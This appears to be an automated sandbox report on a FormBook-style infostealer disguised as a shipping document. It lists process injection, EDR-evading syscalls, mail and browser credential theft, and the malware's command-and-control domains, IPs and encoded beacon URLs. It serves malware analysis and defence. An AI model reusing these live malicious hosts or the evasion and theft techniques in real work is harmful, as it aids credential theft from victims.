            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511196 Sample: SHIPPING DOC MBL+HBL.exe Startdate: 14/09/2024 Architecture: WINDOWS Score: 100 28 www.siyue.xyz 2->28 30 www.quantumnests.xyz 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 SHIPPING DOC MBL+HBL.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 PrWIbKXhdqUKk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 PrWIbKXhdqUKk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.independent200.org 103.42.108.46, 49746, 49747, 49748 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 22->34 36 parcelfly.net 84.32.84.32, 49762, 49763, 49764 NTT-LT-ASLT Lithuania 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SHIPPING DOC MBL+HBL.exe63%ReversingLabsWin32.Trojan.Generic
            SHIPPING DOC MBL+HBL.exe35%VirustotalBrowse
            SHIPPING DOC MBL+HBL.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.independent200.org1%VirustotalBrowse
            chamadaslotgiris.net0%VirustotalBrowse
            dns.ladipage.com0%VirustotalBrowse
            www.personal-loans-jp8.xyz1%VirustotalBrowse
            tigre777gg.online0%VirustotalBrowse
            www.mediaplug.biz0%VirustotalBrowse
            parcelfly.net0%VirustotalBrowse
            www.abbabyfernando.online1%VirustotalBrowse
            www.masteriocp.online1%VirustotalBrowse
            www.parcelfly.net0%VirustotalBrowse
            www.chamadaslotgiris.net2%VirustotalBrowse
            www.tigre777gg.online1%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.parcelfly.net/n59g/0%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/0%Avira URL Cloudsafe
            http://www.parcelfly.net0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.parcelfly.net/n59g/2%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.independent200.org/yl6y/2%VirustotalBrowse
            http://www.parcelfly.net0%VirustotalBrowse
            http://www.mediaplug.biz/osde/2%VirustotalBrowse
            http://www.personal-loans-jp8.xyz/wwak/1%VirustotalBrowse
            http://www.personal-loans-jp8.xyz/wwak/0%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR40%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/1%VirustotalBrowse
            http://www.independent200.org/yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.chamadaslotgiris.net/gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://www.parcelfly.net/n59g/?a0=_6Edzvj0xtFLdH&gd=5pnE2UHiCW8ObGXd+5watRyj/n5k8DcBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ndPNw6uI/UGywwOjVsQmNLB0fJ9Ua+cFGcM=0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/2%VirustotalBrowse
            http://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH0%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.independent200.org
            		103.42.108.46
            		truetrueunknown
            chamadaslotgiris.net
            		3.33.130.190
            		truetrueunknown
            dns.ladipage.com
            		18.139.62.226
            		truetrueunknown
            www.personal-loans-jp8.xyz
            		199.59.243.226
            		truetrueunknown
            www.quantumnests.xyz
            		162.0.239.141
            		truetrue
              		unknown
              tigre777gg.online
              		3.33.130.190
              		truetrueunknown
              www.mediaplug.biz
              		66.81.203.10
              		truetrueunknown
              parcelfly.net
              		84.32.84.32
              		truetrueunknown
              www.parcelfly.net
              		unknown
              		unknowntrueunknown
              www.siyue.xyz
              		unknown
              		unknowntrue
                		unknown
                www.linkbasic.net
                		unknown
                		unknowntrue
                  		unknown
                  www.monos.shop
                  		unknown
                  		unknowntrueunknown
                  www.masteriocp.online
                  		unknown
                  		unknowntrueunknown
                  www.abbabyfernando.online
                  		unknown
                  		unknowntrueunknown
                  www.chamadaslotgiris.net
                  		unknown
                  		unknowntrueunknown
                  www.tigre777gg.online
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.independent200.org/yl6y/true
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mediaplug.biz/osde/true
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.parcelfly.net/n59g/true
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.quantumnests.xyz/vnd3/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mediaplug.biz/osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.personal-loans-jp8.xyz/wwak/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.quantumnests.xyz/vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tigre777gg.online/06rp/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tigre777gg.online/06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.masteriocp.online/p5rq/true
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.independent200.org/yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.chamadaslotgiris.net/gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.personal-loans-jp8.xyz/wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.parcelfly.net/n59g/?a0=_6Edzvj0xtFLdH&gd=5pnE2UHiCW8ObGXd+5watRyj/n5k8DcBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ndPNw6uI/UGywwOjVsQmNLB0fJ9Ua+cFGcM=true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdHtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.parcelfly.netPrWIbKXhdqUKk.exe, 00000008.00000002.3568694635.0000000004CD4000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.comnetbtugc.exe, 00000006.00000002.3569382818.00000000065A0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567902266.0000000004CF2000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000003732000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4netbtugc.exe, 00000006.00000002.3567902266.0000000004518000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000002F58000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  18.139.62.226
                  		dns.ladipage.comUnited States
                  		16509AMAZON-02UStrue
                  162.0.239.141
                  		www.quantumnests.xyzCanada
                  		22612NAMECHEAP-NETUStrue
                  66.81.203.10
                  		www.mediaplug.bizVirgin Islands (BRITISH)
                  		40034CONFLUENCE-NETWORK-INCVGtrue
                  199.59.243.226
                  		www.personal-loans-jp8.xyzUnited States
                  		395082BODIS-NJUStrue
                  84.32.84.32
                  		parcelfly.netLithuania
                  		33922NTT-LT-ASLTtrue
                  103.42.108.46
                  		www.independent200.orgAustralia
                  		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                  3.33.130.190
                  		chamadaslotgiris.netUnited States
                  		8987AMAZONEXPANSIONGBtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1511196
                  Start date and time:2024-09-14 11:09:14 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SHIPPING DOC MBL+HBL.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/3@13/7
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 85%
                  • Number of executed functions: 50
                  • Number of non-executed functions: 270
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  05:11:27API Interceptor6172468x Sleep call for process: netbtugc.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  18.139.62.2263T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • www.masteriocp.online/p5rq/
                  Scan 00093847.exeGet hashmaliciousFormBookBrowse
                  • www.masteriocp.online/wg84/
                  DN.exeGet hashmaliciousFormBookBrowse
                  • www.masteriocp.online/p5rq/
                  DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                  • www.gaolibai.site/dk07/?hJ=D8pto4BPuzWD9&BZy=GDy9Ivf9UNaqrv9frjLto9uu2IkJerzBBeACnqJs3sHtDRLx3rmxpepnBsqEQrJHpKMtcSrveA==
                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                  • www.againbeautywhiteskin.asia/3h10/
                  SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • www.hisako.store/e368/
                  162.0.239.141Purchase order.exeGet hashmaliciousFormBookBrowse
                  • www.goulfy.life/ch9d/
                  Remittance advice.exeGet hashmaliciousFormBookBrowse
                  • www.goulfy.life/ch9d/
                  PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                  • www.fineg.online/mkan/
                  p4LNUqyKZM.exeGet hashmaliciousFormBookBrowse
                  • www.fineg.online/mkan/
                  PO_987654345678.exeGet hashmaliciousFormBookBrowse
                  • www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8
                  INV20240828.exeGet hashmaliciousFormBookBrowse
                  • www.fineg.online/mkan/
                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                  • www.stolex.top/kunq/
                  66.81.203.10r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • www.mediaplug.biz/osde/
                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • www.mediaplug.biz/osde/
                  199.59.243.226invoice.exeGet hashmaliciousFormBookBrowse
                  • www.dom-2.online/m409/
                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                  • www.donante-de-ovulos.biz/ej48/?RD4=Ee68ykewRFJ8A2SRrUCu21Ekxwy9QIGG2b1vwuflBbAtztkjLNJNGzAEmckJ3zA7m4DaBSVbTXoI41WpJRNfzibS1Sp985hxzror3QrCEyk8LcrtyPCzglc=&VzA=dz5HvTSP4ZdlFHDP
                  file.exeGet hashmaliciousFormBookBrowse
                  • www.pussy.coupons/lrsg/
                  Purchase order.exeGet hashmaliciousFormBookBrowse
                  • www.personalloan-fr1.click/u5lh/
                  r9856_7.exeGet hashmaliciousFormBookBrowse
                  • www.personal-loans-jp8.xyz/6ycu/
                  x.exeGet hashmaliciousFormBookBrowse
                  • www.pmjjewels.online/zksk/
                  bin.exeGet hashmaliciousFormBookBrowse
                  • www.pmjjewels.online/zksk/
                  Remittance advice.exeGet hashmaliciousFormBookBrowse
                  • www.personalloan-fr1.click/u5lh/
                  PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                  • www.pet-adoption-01.xyz/hd7z/
                  PO#86637.exeGet hashmaliciousFormBookBrowse
                  • www.dom-2.online/m409/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  dns.ladipage.comr3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 13.228.81.39
                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                  • 13.228.81.39
                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                  • 54.179.173.60
                  Scan 00093847.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                  • 13.228.81.39
                  REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 13.228.81.39
                  DN.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  https://www.newbalancestore.asia/nb530.nh?utm_source=saleGet hashmaliciousUnknownBrowse
                  • 13.228.81.39
                  DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                  • 18.139.62.226
                  www.personal-loans-jp8.xyzr9856_7.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  www.independent200.orgr3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 103.42.108.46
                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 103.42.108.46
                  LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                  • 103.42.108.46
                  www.mediaplug.bizr3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.10
                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.10
                  Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.135
                  6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.200
                  Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.200
                  z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.200
                  DN.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.135
                  Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                  • 66.81.203.200

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AMAZON-02USWorldWars Setup.exeGet hashmaliciousUnknownBrowse
                  • 45.112.123.126
                  http://pro-ciine-base.gitbook.io/Get hashmaliciousUnknownBrowse
                  • 54.76.62.217
                  http://cloud-gs28iiow3-walletconnect1.vercel.app/sign-in/Get hashmaliciousUnknownBrowse
                  • 76.76.21.93
                  http://infofunctionboard.autos/Get hashmaliciousUnknownBrowse
                  • 18.245.31.129
                  http://metasamsk-uswallt.gitbook.io/Get hashmaliciousUnknownBrowse
                  • 18.239.83.59
                  https://metheimasskieloginie.gitbook.io/Get hashmaliciousUnknownBrowse
                  • 18.239.83.59
                  http://opm.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                  • 13.224.194.48
                  https://rb.gy/xy1qxpGet hashmaliciousUnknownBrowse
                  • 52.57.4.210
                  https://11158ee.wcomhost.com/Get hashmaliciousUnknownBrowse
                  • 13.35.58.72
                  https://join-mywhatsapp.pages.dev/Get hashmaliciousUnknownBrowse
                  • 52.19.138.177
                  NAMECHEAP-NETUShttps://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                  • 162.0.228.73
                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                  • 162.0.228.73
                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Br%C2%ADo%C2%ADt%C2%ADv%C2%AD2%C2%AD4.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FKtdCRbWJN443KOWzPtjJuhJU/YW15LmpGet hashmaliciousHTMLPhisherBrowse
                  • 192.64.117.211
                  SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                  • 199.192.21.169
                  Play_VM-Now(Trager)CLQD.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 199.192.22.193
                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                  • 162.0.238.43
                  file.exeGet hashmaliciousFormBookBrowse
                  • 199.192.21.169
                  http://www.nationwidetherapygroup.comGet hashmaliciousUnknownBrowse
                  • 198.54.116.84
                  Purchase order.exeGet hashmaliciousFormBookBrowse
                  • 162.0.239.141
                  http://jnhxqc.com/Get hashmaliciousUnknownBrowse
                  • 162.0.229.97
                  BODIS-NJUSinvoice.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  file.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  Purchase order.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  r9856_7.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  x.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  bin.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  Remittance advice.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  PO#86637.exeGet hashmaliciousFormBookBrowse
                  • 199.59.243.226
                  CONFLUENCE-NETWORK-INCVGr3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.10
                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                  • 208.91.197.27
                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                  • 208.91.197.27
                  r9856_7.exeGet hashmaliciousFormBookBrowse
                  • 208.91.197.13
                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.10
                  BCNFNjvJNq.exeGet hashmaliciousADWIND, Lokibot, Ramnit, SalityBrowse
                  • 204.11.56.48
                  Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                  • 66.81.203.135
                  EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                  • 208.91.197.27
